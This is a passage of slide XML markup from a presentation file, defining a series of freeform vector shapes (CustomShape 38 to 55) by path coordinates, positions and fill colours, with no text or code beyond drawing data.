                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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250" name="CustomShape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2678040" y="4367160"/>
            <a:ext cx="10800" cy="52200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="33">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>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251" name="CustomShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828880" y="4314960"/>
            <a:ext cx="37800" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="24" h="90">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="17"/>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252" name="CustomShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830680" y="4325760"/>
            <a:ext cx="29880" cy="120240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="76">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>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253" name="CustomShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="4335480"/>
            <a:ext cx="23400" cy="99720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t"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254" name="CustomShape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="4344840"/>
            <a:ext cx="18720" cy="78840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="50">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="5"/>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255" name="CustomShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835360" y="4356000"/>
            <a:ext cx="14040" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="36">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>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256" name="CustomShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639880" y="4341960"/>
            <a:ext cx="6120" cy="186840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="CustomShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706840" y="4336920"/>
            <a:ext cx="72720" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="46" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>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258" name="CustomShape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="4402080"/>
            <a:ext cx="58320" cy="14040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="9">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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59" name="CustomShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="4363920"/>
            <a:ext cx="58320" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="10">
                <a:moveTo>
                  <a:pt x="0" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>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5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>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0" name="CustomShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660760" y="4344840"/>
            <a:ext cx="96480" cy="177480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="61" h="112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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261" name="CustomShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708280" y="4303800"/>
            <a:ext cx="124920" cy="23400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>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262" name="CustomShape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637000" y="4525920"/>
            <a:ext cx="209160" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="45">
                <a:moveTo>
                  <a:pt x="55" y="44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="28"/>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30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="44"/>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3" name="CustomShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592360" y="4545000"/>
            <a:ext cx="213840" cy="63000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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4" name="CustomShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629080" y="4537080"/>
            <a:ext cx="209160" cy="55080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="35">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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5" name="CustomShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="4540320"/>
            <a:ext cx="210600" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="133" h="38">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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6" name="CustomShape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382920" y="4037040"/>
            <a:ext cx="517320" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t"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close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="CustomShape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382920" y="4037040"/>
            <a:ext cx="517320" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="326" h="65">
                <a:moveTo>
                  <a:pt x="162" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="146" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="12"/>
                </a:lnTo>
